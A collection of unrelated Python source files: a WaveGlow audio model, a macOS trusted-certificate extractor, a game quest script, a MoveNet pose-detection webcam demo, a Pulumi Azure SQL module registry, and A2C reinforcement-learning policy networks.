t_act = torch.tanh(in_act[:, :n_channels_int, :])
s_act = torch.sigmoid(in_act[:, n_channels_int:, :])
acts = t_act * s_act
return acts
class WaveGlowLoss(torch.nn.Module):
def __init__(self, sigma=1.0):
super(WaveGlowLoss, self).__init__()
self.sigma = sigma
def forward(self, model_output):
z, log_s_list, log_det_W_list = model_output
for i, log_s in enumerate(log_s_list):
if i == 0:
log_s_total = torch.sum(log_s)
log_det_W_total = log_det_W_list[i]
else:
log_s_total = log_s_total + torch.sum(log_s)
log_det_W_total += log_det_W_list[i]
loss = torch.sum(z*z)/(2*self.sigma*self.sigma) - log_s_total - log_det_W_total
return loss/(z.size(0)*z.size(1)*z.size(2))
class Invertible1x1Conv(torch.nn.Module):
"""
The layer outputs both the convolution, and the log determinant
of its weight matrix. If reverse=True it does convolution with
inverse
"""
def __init__(self, c):
super(Invertible1x1Conv, self).__init__()
self.conv = torch.nn.Conv1d(c, c, kernel_size=1, stride=1, padding=0,
bias=False)
# Sample a random orthonormal matrix to initialize weights
W = torch.qr(torch.FloatTensor(c, c).normal_())[0]
# Ensure determinant is 1.0 not -1.0
if torch.det(W) < 0:
W[:,0] = -1*W[:,0]
W = W.view(c, c, 1)
self.conv.weight.data = W
def forward(self, z, reverse=False):
# shape
batch_size, group_size, n_of_groups = z.size()
W = self.conv.weight.squeeze()
if reverse:
if not hasattr(self, 'W_inverse'):
# Reverse computation
W_inverse = W.float().inverse()
W_inverse = Variable(W_inverse[..., None])
if z.type() == 'torch.cuda.HalfTensor':
W_inverse = W_inverse.half()
self.W_inverse = W_inverse
z = F.conv1d(z, self.W_inverse, bias=None, stride=1, padding=0)
return z
else:
# Forward computation
log_det_W = batch_size * n_of_groups * torch.logdet(W)
z = self.conv(z)
return z, log_det_W
class WN(torch.nn.Module):
"""
This is the WaveNet like layer for the affine coupling. The primary difference
from WaveNet is the convolutions need not be causal. There is also no dilation
size reset. The dilation only doubles on each layer
"""
def __init__(self, n_in_channels, n_mel_channels, n_layers, n_channels,
kernel_size):
super(WN, self).__init__()
assert(kernel_size % 2 == 1)
assert(n_channels % 2 == 0)
self.n_layers = n_layers
self.n_channels = n_channels
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
start = torch.nn.Conv1d(n_in_channels, n_channels, 1)
start = torch.nn.utils.weight_norm(start, name='weight')
self.start = start
# Initializing last layer to 0 makes the affine coupling layers
# do nothing at first. This helps with training stability
end = torch.nn.Conv1d(n_channels, 2*n_in_channels, 1)
end.weight.data.zero_()
end.bias.data.zero_()
self.end = end
cond_layer = torch.nn.Conv1d(n_mel_channels, 2*n_channels*n_layers, 1)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight')
for i in range(n_layers):
dilation = 2 ** i
padding = int((kernel_size*dilation - dilation)/2)
in_layer = torch.nn.Conv1d(n_channels, 2*n_channels, kernel_size,
dilation=dilation, padding=padding)
in_layer = torch.nn.utils.weight_norm(in_layer, name='weight')
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2*n_channels
else:
res_skip_channels = n_channels
res_skip_layer = torch.nn.Conv1d(n_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight')
self.res_skip_layers.append(res_skip_layer)
def forward(self, forward_input):
audio, spect = forward_input
audio = self.start(audio)
output = torch.zeros_like(audio)
n_channels_tensor = torch.IntTensor([self.n_channels])
spect = self.cond_layer(spect)
for i in range(self.n_layers):
spect_offset = i*2*self.n_channels
acts = fused_add_tanh_sigmoid_multiply(
self.in_layers[i](audio),
spect[:,spect_offset:spect_offset+2*self.n_channels,:],
n_channels_tensor)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
audio = audio + res_skip_acts[:,:self.n_channels,:]
output = output + res_skip_acts[:,self.n_channels:,:]
else:
output = output + res_skip_acts
return self.end(output)
class WaveGlow(torch.nn.Module):
def __init__(self, n_mel_channels, n_flows, n_group, n_early_every,
n_early_size, WN_config):
super(WaveGlow, self).__init__()
self.upsampling = torch.nn.ConvTranspose1d(n_mel_channels,
n_mel_channels,
512, stride=160)
assert(n_group % 2 == 0)
self.n_flows = n_flows
self.n_group = n_group
self.n_early_every = n_early_every
self.n_early_size = n_early_size
self.WN = torch.nn.ModuleList()
self.convinv = torch.nn.ModuleList()
n_half = int(n_group/2)
# Set up layers with the right sizes based on how many dimensions
# have been output already
n_remaining_channels = n_group
for k in range(n_flows):
if k % self.n_early_every == 0 and k > 0:
n_half = n_half - int(self.n_early_size/2)
n_remaining_channels = n_remaining_channels - self.n_early_size
self.convinv.append(Invertible1x1Conv(n_remaining_channels))
self.WN.append(WN(n_half, n_mel_channels*n_group, **WN_config))
self.n_remaining_channels = n_remaining_channels # Useful during inference
def forward(self, forward_input):
"""
forward_input[0] = mel_spectrogram: batch x n_mel_channels x frames
forward_input[1] = audio: batch x time
"""
spect, audio = forward_input
# Upsample spectrogram to size of audio
spect = self.upsampling(spect)
assert(spect.size(2) >= audio.size(1))
if spect.size(2) > audio.size(1):
spect = spect[:, :, :audio.size(1)]
spect = spect.unfold(2, self.n_group, self.n_group).permute(0, 2, 1, 3)
spect = spect.contiguous().view(spect.size(0), spect.size(1), -1).permute(0, 2, 1)
audio = audio.unfold(1, self.n_group, self.n_group).permute(0, 2, 1)
output_audio = []
log_s_list = []
log_det_W_list = []
for k in range(self.n_flows):
if k % self.n_early_every == 0 and k > 0:
output_audio.append(audio[:,:self.n_early_size,:])
audio = audio[:,self.n_early_size:,:]
audio, log_det_W = self.convinv[k](audio)
log_det_W_list.append(log_det_W)
n_half = int(audio.size(1)/2)
audio_0 = audio[:,:n_half,:]
audio_1 = audio[:,n_half:,:]
output = self.WN[k]((audio_0, spect))
log_s = output[:, n_half:, :]
b = output[:, :n_half, :]
audio_1 = torch.exp(log_s)*audio_1 + b
log_s_list.append(log_s)
audio = torch.cat([audio_0, audio_1],1)
output_audio.append(audio)
return torch.cat(output_audio,1), log_s_list, log_det_W_list
def infer(self, spect, sigma=1.0):
spect = self.upsampling(spect)
# trim conv artifacts. maybe pad spec to kernel multiple
time_cutoff = self.upsampling.kernel_size[0] - 2 * self.upsampling.stride[0]
spect = spect[:, :, :-time_cutoff]
spect = spect.unfold(2, self.n_group, self.n_group).permute(0, 2, 1, 3)
spect = spect.contiguous().view(spect.size(0), spect.size(1), -1).permute(0, 2, 1)
if spect.type() == 'torch.cuda.HalfTensor':
audio = torch.cuda.HalfTensor(spect.size(0),
self.n_remaining_channels,
spect.size(2)).normal_()
else:
audio = torch.cuda.FloatTensor(spect.size(0),
self.n_remaining_channels,
spect.size(2)).normal_()
audio = torch.autograd.Variable(sigma*audio)
for k in reversed(range(self.n_flows)):
n_half = int(audio.size(1)/2)
audio_0 = audio[:,:n_half,:]
audio_1 = audio[:,n_half:,:]
output = self.WN[k]((audio_0, spect))
s = output[:, n_half:, :]
b = output[:, :n_half, :]
audio_1 = (audio_1 - b)/torch.exp(s)
audio = torch.cat([audio_0, audio_1],1)
audio = self.convinv[k](audio, reverse=True)
if k % self.n_early_every == 0 and k > 0:
if spect.type() == 'torch.cuda.HalfTensor':
z = torch.cuda.HalfTensor(spect.size(0), self.n_early_size, spect.size(2)).normal_()
else:
z = torch.cuda.FloatTensor(spect.size(0), self.n_early_size, spect.size(2)).normal_()
audio = torch.cat((sigma*z, audio),1)
audio = audio.permute(0,2,1).contiguous().view(audio.size(0), -1).data
return audio
@staticmethod
def remove_weightnorm(model):
waveglow = model
for WN in waveglow.WN:
WN.start = torch.nn.utils.remove_weight_norm(WN.start)
WN.in_layers = remove(WN.in_layers)
WN.cond_layer = torch.nn.utils.remove_weight_norm(WN.cond_layer)
WN.res_skip_layers = remove(WN.res_skip_layers)
return waveglow
def remove(conv_list):
new_conv_list = torch.nn.ModuleList()
for old_conv in conv_list:
old_conv = torch.nn.utils.remove_weight_norm(old_conv)
new_conv_list.append(old_conv)
return new_conv_list
|
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import hashlib
import sys
from .._ffi import new, unwrap
from ._core_foundation import CoreFoundation, CFHelpers
from ._security import Security, SecurityConst, handle_sec_error
if sys.version_info < (3,):
range = xrange # noqa
__all__ = [
'extract_from_system',
'system_path',
]
def system_path():
return None
def extract_from_system():
"""
Extracts trusted CA certificates from the OS X trusted root keychain.
:raises:
OSError - when an error is returned by the OS crypto library
:return:
A list of 3-element tuples:
- 0: a byte string of a DER-encoded certificate
- 1: a set of unicode strings that are OIDs of purposes to trust the
certificate for
- 2: a set of unicode strings that are OIDs of purposes to reject the
certificate for
"""
certs_pointer_pointer = new(CoreFoundation, 'CFArrayRef *')
res = Security.SecTrustCopyAnchorCertificates(certs_pointer_pointer)
handle_sec_error(res)
certs_pointer = unwrap(certs_pointer_pointer)
certificates = {}
trust_info = {}
all_purposes = '2.5.29.37.0'
default_trust = (set(), set())
length = CoreFoundation.CFArrayGetCount(certs_pointer)
for index in range(0, length):
cert_pointer = CoreFoundation.CFArrayGetValueAtIndex(certs_pointer, index)
der_cert, cert_hash = _cert_details(cert_pointer)
certificates[cert_hash] = der_cert
CoreFoundation.CFRelease(certs_pointer)
for domain in [SecurityConst.kSecTrustSettingsDomainUser, SecurityConst.kSecTrustSettingsDomainAdmin]:
cert_trust_settings_pointer_pointer = new(CoreFoundation, 'CFArrayRef *')
res = Security.SecTrustSettingsCopyCertificates(domain, cert_trust_settings_pointer_pointer)
if res == SecurityConst.errSecNoTrustSettings:
continue
handle_sec_error(res)
cert_trust_settings_pointer = unwrap(cert_trust_settings_pointer_pointer)
length = CoreFoundation.CFArrayGetCount(cert_trust_settings_pointer)
for index in range(0, length):
cert_pointer = CoreFoundation.CFArrayGetValueAtIndex(cert_trust_settings_pointer, index)
trust_settings_pointer_pointer = new(CoreFoundation, 'CFArrayRef *')
res = Security.SecTrustSettingsCopyTrustSettings(cert_pointer, domain, trust_settings_pointer_pointer)
# In OS X 10.11, this value started being seen. From the comments in
# the Security Framework Reference, the lack of any settings should
# indicate "always trust this certificate"
if res == SecurityConst.errSecItemNotFound:
continue
# If the trust settings for a certificate are invalid, we need to
# assume the certificate should not be trusted
if res == SecurityConst.errSecInvalidTrustSettings:
der_cert, cert_hash = _cert_details(cert_pointer)
if cert_hash in certificates:
del certificates[cert_hash]
continue
handle_sec_error(res)
trust_settings_pointer = unwrap(trust_settings_pointer_pointer)
trust_oids = set()
reject_oids = set()
settings_length = CoreFoundation.CFArrayGetCount(trust_settings_pointer)
for settings_index in range(0, settings_length):
settings_dict_entry = CoreFoundation.CFArrayGetValueAtIndex(trust_settings_pointer, settings_index)
settings_dict = CFHelpers.cf_dictionary_to_dict(settings_dict_entry)
# No policy OID means the trust result is for all purposes
policy_oid = settings_dict.get('kSecTrustSettingsPolicy', {}).get('SecPolicyOid', all_purposes)
# 0 = kSecTrustSettingsResultInvalid
# 1 = kSecTrustSettingsResultTrustRoot
# 2 = kSecTrustSettingsResultTrustAsRoot
# 3 = kSecTrustSettingsResultDeny
# 4 = kSecTrustSettingsResultUnspecified
trust_result = settings_dict.get('kSecTrustSettingsResult', 1)
should_trust = trust_result != 0 and trust_result != 3
if should_trust:
trust_oids.add(policy_oid)
else:
reject_oids.add(policy_oid)
der_cert, cert_hash = _cert_details(cert_pointer)
# If rejected for all purposes, we don't export the certificate
if all_purposes in reject_oids:
if cert_hash in certificates:
del certificates[cert_hash]
else:
if all_purposes in trust_oids:
trust_oids = set([all_purposes])
trust_info[cert_hash] = (trust_oids, reject_oids)
CoreFoundation.CFRelease(trust_settings_pointer)
CoreFoundation.CFRelease(cert_trust_settings_pointer)
output = []
for cert_hash in certificates:
cert_trust_info = trust_info.get(cert_hash, default_trust)
output.append((certificates[cert_hash], cert_trust_info[0], cert_trust_info[1]))
return output
def _cert_details(cert_pointer):
"""
Return the certificate and a hash of it
:param cert_pointer:
A SecCertificateRef
:return:
A 2-element tuple:
- [0]: A byte string of the SHA1 hash of the cert
- [1]: A byte string of the DER-encoded contents of the cert
"""
data_pointer = None
try:
data_pointer = Security.SecCertificateCopyData(cert_pointer)
der_cert = CFHelpers.cf_data_to_bytes(data_pointer)
cert_hash = hashlib.sha1(der_cert).digest()
return (der_cert, cert_hash)
finally:
if data_pointer is not None:
CoreFoundation.CFRelease(data_pointer)
|
# Used in Party Quest - Escape
if sm.hasMobsInField():
sm.warp(921160400, 0) # A secret Door to the Aerial Prison
else:
sm.chat("Please eliminate all mobs.")
sm.dispose()
|
"""The purpose of this script is to compare the performance and
accuracy of possible object detection models for real time inference
in a normal computer cpu. We are going to compare several models
selected from the object detection collection of TF hub
(https://tfhub.dev/tensorflow/collections/object_detection/1)
"""
import os
import sys
dir_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(dir_path))
import cv2 as cv
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
from utils import (
convert_saved_model_tflite,
download_model_tf_hub,
getFPS,
load_tflite_model,
predict_tflite_model,
draw_text_top_left_height,
draw_skel_and_kp,
unprocess_keypoint_coords,
)
# load tflite model (press 'l' to switch)
tflite = False
# Selecting our camera
device = 0
cam = cv.VideoCapture(device)
# Setting the height of the image that we expect
cam.set(3, 1280)
cam.set(4, 720)
# Creating window to display
cv.namedWindow("Object Detection", cv.WINDOW_NORMAL)
# Setting FPS buffer
BUFFER_SIZE = 100
times = np.zeros(BUFFER_SIZE)
model_idx = 0
models = [
# Load this model pressing number 1 in your keyboard
{
"name": "singlepose-lightning",
"model_path": "movenet_singlepose_lightning_4",
"hub_path": "https://tfhub.dev/google/movenet/singlepose/lightning/4",
"input_shape": (192, 192),
"threshold": 0.5,
},
# Load this model pressing number 2 in your keyboard, load by default
{
"name": "singlepose-thunder",
"model_path": "movenet_singlepose_thunder_4",
"hub_path": "https://tfhub.dev/google/movenet/singlepose/thunder/4",
"input_shape": (256, 256),
"threshold": 0.5,
},
# Load this model pressing number 3 in your keyboard, load by default
{
"name": "multipose-lightning",
"model_path": "movenet_multipose_lightning_4",
"hub_path": "https://tfhub.dev/google/movenet/multipose/lightning/1",
"input_shape": (256, 256),
"threshold": 0.5,
},
]
load_model = True
while True:
if load_model:
# restarting buffer for fps
times = np.zeros(BUFFER_SIZE)
# initializing models variables
input_shape = models[model_idx]["input_shape"]
saved_model_path = os.path.join(
dir_path, "models", models[model_idx]["model_path"]
)
if not tflite:
print("Loading saved_model...")
# if a model is already downloaded it loads it from local, if not from TF hub
if not os.path.isdir(saved_model_path):
model = download_model_tf_hub(models[model_idx], dir_path=dir_path)
else:
model = tf.saved_model.load(saved_model_path)
movenet = model.signatures["serving_default"]
else:
print("Loading tflite model...")
tflite_model_path = f"{saved_model_path}.tflite"
# if tflite model is not created we need to create it
if not os.path.isfile(tflite_model_path):
# if saved model is not downloaded from tf hub we need to do so
if not os.path.isdir(saved_model_path):
download_model_tf_hub(
models[model_idx],
dir_path=dir_path,
return_model=False,
)
# converting model to tflite
convert_saved_model_tflite(saved_model_path)
# loading tflite model
tflite_model = load_tflite_model(tflite_model_path)
# Turn off flag to load a new model
load_model = False
print("Model loaded and ready for inference! Let's go!")
ret, image = cam.read()
if ret:
# preprocessing image
inference_image = tf.expand_dims(image, axis=0)
inference_image = tf.cast(
tf.image.resize(inference_image, input_shape), dtype=tf.int32
)
# inference
if not tflite:
output = movenet(inference_image)
else:
output = predict_tflite_model(tflite_model, inference_image)
# unprocessing output
output = tf.squeeze(output["output_0"], axis=0).numpy()
instance_scores = np.ones(len(output))
keypoint_scores = output[:, :, 2]
keypoint_coords = output[:, :, :2]
keypoint_coords = unprocess_keypoint_coords(
keypoint_coords, image.shape[:2], input_shape
)
# plotting results in image
image = draw_skel_and_kp(
image,
instance_scores=instance_scores,
keypoint_scores=keypoint_scores,
keypoint_coords=keypoint_coords,
min_pose_score=0.5,
min_part_score=0.5,
)
# Getting and printing FPS
fps = getFPS(times)
draw_text_top_left_height(image, f"FPS: {fps:.2f}")
# Showing image
cv.imshow("Object Detection", image)
key = cv.waitKey(1)
# Press esc to stop the execution
if key == 27:
break
elif key == ord("1"):
if model_idx != 0:
model_idx = 0
load_model = True
elif key == ord("2"):
if model_idx != 1:
model_idx = 1
load_model = True
elif key == ord("3"):
if model_idx != 2:
model_idx = 2
load_model = True
elif key == ord("5"):
if model_idx != 2:
model_idx = 4
load_model = True
elif key == ord("l"):
tflite = not tflite
load_model = True
elif key == ord("s"):
non_max = not non_max
cv.destroyAllWindows()
cam.release()
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from ._enums import *
from .database import *
from .database_vulnerability_assessment import *
from .database_vulnerability_assessment_rule_baseline import *
from .get_database import *
from .get_database_vulnerability_assessment import *
from .get_database_vulnerability_assessment_rule_baseline import *
from .get_job import *
from .get_job_agent import *
from .get_job_credential import *
from .get_job_step import *
from .get_job_target_group import *
from .get_managed_database import *
from .get_managed_instance_administrator import *
from .get_sensitivity_label import *
from .get_server_dns_alias import *
from .job import *
from .job_agent import *
from .job_credential import *
from .job_step import *
from .job_target_group import *
from .managed_database import *
from .managed_instance_administrator import *
from .sensitivity_label import *
from .server_dns_alias import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from ... import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "azure-native:sql/v20170301preview:Database":
return Database(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:DatabaseVulnerabilityAssessment":
return DatabaseVulnerabilityAssessment(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:DatabaseVulnerabilityAssessmentRuleBaseline":
return DatabaseVulnerabilityAssessmentRuleBaseline(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:Job":
return Job(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:JobAgent":
return JobAgent(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:JobCredential":
return JobCredential(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:JobStep":
return JobStep(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:JobTargetGroup":
return JobTargetGroup(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:ManagedDatabase":
return ManagedDatabase(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:ManagedInstanceAdministrator":
return ManagedInstanceAdministrator(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:SensitivityLabel":
return SensitivityLabel(name, pulumi.ResourceOptions(urn=urn))
elif typ == "azure-native:sql/v20170301preview:ServerDnsAlias":
return ServerDnsAlias(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("azure-native", "sql/v20170301preview", _module_instance)
_register_module()
|
import numpy as np
import tensorflow as tf
from baselines.a2c.utils import conv, fc, conv_to_fc, batch_to_seq, seq_to_batch, lstm, lnlstm, sample, check_shape
from baselines.common.distributions import make_pdtype
import baselines.common.tf_util as U
import gym
class LnLstmPolicy(object):
def __init__(self, sess, ob_space, ac_space, nenv, nsteps, nstack, nlstm=256, reuse=False):
nbatch = nenv*nsteps
nh, nw, nc = ob_space.shape
ob_shape = (nbatch, nh, nw, nc*nstack)
nact = ac_space.n
X = tf.placeholder(tf.uint8, ob_shape) #obs
M = tf.placeholder(tf.float32, [nbatch]) #mask (done t-1)
S = tf.placeholder(tf.float32, [nenv, nlstm*2]) #states
with tf.variable_scope("model", reuse=reuse):
h = conv(tf.cast(X, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2))
h2 = conv(h, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3 = conv(h2, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3 = conv_to_fc(h3)
h4 = fc(h3, 'fc1', nh=512, init_scale=np.sqrt(2))
xs = batch_to_seq(h4, nenv, nsteps) # Comments by Fei: xs is list of nsteps, each is nenv * nh
ms = batch_to_seq(M, nenv, nsteps) # Comments by Fei: ms is list of nsteps, each is nenv vector
h5, snew = lnlstm(xs, ms, S, 'lstm1', nh=nlstm) # Comment by Fei: h5 is the same dimension as xs, but with value changed by LSTM. snew is new S
h5 = seq_to_batch(h5) # Comments by Fei: h5 is nbatch * nh again, just like h4
pi = fc(h5, 'pi', nact, act=lambda x:x) # Comments by Fei: pi is nbatch * nact
vf = fc(h5, 'v', 1, act=lambda x:x) # Comments by Fei: vf is nbatch * 1
v0 = vf[:, 0] # Comments by Fei: v0 is nbatch vector, each value is the value function of a state
a0 = sample(pi) # Comments by Fei: a0 is nbatch vector, each value is the best choice of action, at that state
self.initial_state = np.zeros((nenv, nlstm*2), dtype=np.float32)
def step(ob, state, mask):
a, v, s = sess.run([a0, v0, snew], {X:ob, S:state, M:mask})
return a, v, s
def value(ob, state, mask):
return sess.run(v0, {X:ob, S:state, M:mask})
self.X = X
self.M = M
self.S = S
self.pi = pi
self.vf = vf
self.step = step
self.value = value
class LstmPolicy(object):
def __init__(self, sess, ob_space, ac_space, nenv, nsteps, nstack, nlstm=256, reuse=False):
nbatch = nenv*nsteps
nh, nw, nc = ob_space.shape
ob_shape = (nbatch, nh, nw, nc*nstack)
nact = ac_space.n
X = tf.placeholder(tf.uint8, ob_shape) #obs
M = tf.placeholder(tf.float32, [nbatch]) #mask (done t-1)
S = tf.placeholder(tf.float32, [nenv, nlstm*2]) #states
with tf.variable_scope("model", reuse=reuse):
h = conv(tf.cast(X, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2))
h2 = conv(h, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3 = conv(h2, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3 = conv_to_fc(h3)
h4 = fc(h3, 'fc1', nh=512, init_scale=np.sqrt(2))
xs = batch_to_seq(h4, nenv, nsteps)
ms = batch_to_seq(M, nenv, nsteps)
h5, snew = lstm(xs, ms, S, 'lstm1', nh=nlstm)
h5 = seq_to_batch(h5)
pi = fc(h5, 'pi', nact, act=lambda x:x)
vf = fc(h5, 'v', 1, act=lambda x:x)
v0 = vf[:, 0]
a0 = sample(pi)
self.initial_state = np.zeros((nenv, nlstm*2), dtype=np.float32)
def step(ob, state, mask):
a, v, s = sess.run([a0, v0, snew], {X:ob, S:state, M:mask})
return a, v, s
def value(ob, state, mask):
return sess.run(v0, {X:ob, S:state, M:mask})
self.X = X
self.M = M
self.S = S
self.pi = pi
self.vf = vf
self.step = step
self.value = value
class CnnPolicy(object):
def __init__(self, sess, ob_space, ac_space, nenv, nsteps, nstack, reuse=False):
nbatch = nenv*nsteps
nh, nw, nc = ob_space.shape
ob_shape = (nbatch, nh, nw, nc*nstack)
nact = ac_space.n
X = tf.placeholder(tf.int8, ob_shape) #obs Change for SAT: SAT input is of type int8!
with tf.variable_scope("model", reuse=reuse):
h = conv(tf.cast(X, tf.float32), 'c1', nf=32, rf=8, stride=1, init_scale=np.sqrt(2)) # Change for SAT, don't divide input by 255.
# h = conv(tf.cast(X, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2)) # Change for SAT, don't divide input by 255.
h2 = conv(h, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3 = conv(h2, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3 = conv_to_fc(h3)
h4 = fc(h3, 'fc1', nh=512, init_scale=np.sqrt(2))
pi = fc(h4, 'pi', nact, act=lambda x:x)
vf = fc(h4, 'v', 1, act=lambda x:x)
v0 = vf[:, 0]
a0 = sample(pi)
self.initial_state = [] #not stateful
def step(ob, *_args, **_kwargs):
a, v = sess.run([a0, v0], {X:ob})
return a, v, [] #dummy state
def value(ob, *_args, **_kwargs):
return sess.run(v0, {X:ob})
self.X = X
self.pi = pi
self.vf = vf
self.step = step
self.value = value
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.